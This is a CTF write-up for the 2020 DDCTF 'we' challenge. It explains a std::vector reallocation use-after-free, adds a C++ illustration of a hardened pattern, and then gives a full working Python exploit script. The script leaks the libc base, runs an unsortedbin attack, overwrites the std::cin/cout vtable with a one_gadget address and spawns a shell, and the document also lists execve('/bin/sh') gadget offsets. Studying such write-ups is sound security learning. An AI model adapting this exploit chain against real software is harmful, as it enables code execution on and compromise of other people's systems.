2020DDCTF we

    Technology  2024-12-06

    A std::vector grows its capacity in steps of 1, 2, 4, 8, 16 ... elements. Each time the current capacity is exceeded, the previous heap chunk is freed and a larger one is allocated. The corresponding chunk sizes are 0x20, 0x20, 0x50, 0x90 ...

    The vector's in-memory layout is three pointers:

    first  |  cur |  last

    The vulnerability in this challenge: after the show function pushes 0xaabbccdd, if the vector has to grow, the previous chunk is freed, but the global variable begin still points to the old heap chunk, which yields a use-after-free (UAF).
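As an added illustration (not code from the writeup or the challenge binary), the C++ below shows the growth behaviour described above and the mitigation: a begin pointer cached across push_back dangles exactly when push_back changes the capacity, while an index resolved against the live buffer on every access cannot dangle. The names push_invalidates, fill_to_capacity, cached_begin_goes_stale and SafeView are my own.

```cpp
#include <cstddef>
#include <cstdint>
#include <vector>

using Num = uint32_t;

// Returns true when pushing `value` forced a reallocation, i.e. every pointer
// or iterator previously taken into `v` (such as a cached begin) now dangles.
// The standard guarantees that push_back keeps existing pointers valid only
// while the capacity does not change, so capacity is the reliable signal.
bool push_invalidates(std::vector<Num>& v, Num value) {
    const std::size_t cap_before = v.capacity();
    v.push_back(value);
    return v.capacity() != cap_before;
}

// Fill until size == capacity, so the next push_back must reallocate
// (this is the "threshold exceeded" moment the writeup describes).
void fill_to_capacity(std::vector<Num>& v) {
    if (v.capacity() == 0) v.reserve(1);
    while (v.size() < v.capacity()) v.push_back(0);
}

// The bug pattern: cache begin (like the challenge's global `begin`), then
// push. Returns true if the cached pointer is now stale; it is deliberately
// never dereferenced here, because that dereference would be the UAF.
bool cached_begin_goes_stale(std::vector<Num>& v, Num value) {
    Num* cached_begin = v.data();
    const bool reallocated = push_invalidates(v, value);
    (void)cached_begin;  // dangling when reallocated == true
    return reallocated;
}

// Hardened pattern: remember an index, not a pointer, and resolve it against
// the live buffer on each access. Growth can never leave a stale pointer.
struct SafeView {
    std::size_t idx = 0;
    Num read(const std::vector<Num>& v) const { return v.at(idx); }
};

// Pushes the writeup's marker value, forces a reallocation, and reads the
// marker back through the index-based view; returns 0xaabbccdd.
Num demo_safe_read() {
    std::vector<Num> v;
    v.push_back(0xaabbccdd);
    fill_to_capacity(v);
    SafeView sv{0};
    push_invalidates(v, 0x41);  // old buffer is freed here
    return sv.read(v);
}
```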

    The exploitation approach is to overwrite the vtable pointer of std::cout/std::cin, which lives in the .bss segment, with a one_gadget address.

    #-*- coding:utf-8 -*-
    from PwnContext import *

    context.terminal = ['tmux','splitw','-h']

    # thin wrappers around the PwnContext I/O helpers
    s = lambda data :ctx.send(str(data))
    sa = lambda delim,data :ctx.sendafter(str(delim), str(data))
    sl = lambda data :ctx.sendline(str(data))
    sla = lambda delim,data :ctx.sendlineafter(str(delim), str(data))
    r = lambda numb=4096 :ctx.recv(numb)
    ru = lambda delims, drop=True :ctx.recvuntil(delims, drop)
    irt = lambda :ctx.interactive()
    rs = lambda *args, **kwargs :ctx.start(*args, **kwargs)
    dbg = lambda gs='', **kwargs :ctx.debug(gdbscript=gs, **kwargs)
    uu32 = lambda data :u32(data.ljust(4, '\0'))
    uu64 = lambda data :u64(data.ljust(8, '\0'))
    leak_libc=lambda data=0 :uu64(ru('\x7f',drop=False)[-6:])-data

    debugg = 1
    logg = 0
    ctx.binary = './pwn1'
    ctx.breakpoints=[0x40121E]
    ctx.symbols={'lst':0x605380}
    if debugg:
        rs()
    else:
        ctx.remote = ('0.0.0.0', 23339)
        rs('remote')
    #ctx.start("gdb",gdbscript="set follow-fork-mode child\nc")
    if logg:
        context.log_level='debug'

    def lg(s,d):
        success(str(s)+' = '+hex(d))

    # menu helpers for the challenge binary
    def cmd(idx):
        sla('>>',idx)

    def add(c):
        cmd(1)
        sla('num:',c)

    def free():
        cmd(3)

    def show():
        cmd(2)

    #leak libc_base
    for i in range(0x10):
        add(i)
    show()
    ru('1:')
    libc_base = int(ru('\n'))-0x3c4b78
    lg('libc_base',libc_base)
    for i in range(34):
        sla('(y/n):','n')
    free()#clear

    one = 0x4526a+libc_base
    lg('one',one)

    #avoid consolidate: move top_chunk down
    for i in range(0x21):
        add(str(one))
    free()#clear

    #unsortedbin attack
    for i in range(0x10):
        add(str(0x21))
    show()
    sla('(y/n):','n')
    sla('(y/n):','y')
    sl(str(0x6051E8))
    for i in range(15):
        sla('(y/n):','n')
    sla('(y/n):','y')
    sl(str(0x41))#change size to avoid unlink
    for i in range(16):#rest
        sla('(y/n):','n')
    free()#clear
    #dbg()

    for i in range(9):
        add(i)
    irt()

    '''
    0x45216 execve("/bin/sh", rsp+0x30, environ)
    constraints:
      rax == NULL

    0x4526a execve("/bin/sh", rsp+0x30, environ)
    constraints:
      [rsp+0x30] == NULL

    0xf02a4 execve("/bin/sh", rsp+0x50, environ)
    constraints:
      [rsp+0x50] == NULL

    0xf1147 execve("/bin/sh", rsp+0x70, environ)
    constraints:
      [rsp+0x70] == NULL
    '''

    https://github.com/Snowleopard-bin/pwn/tree/master/cpp
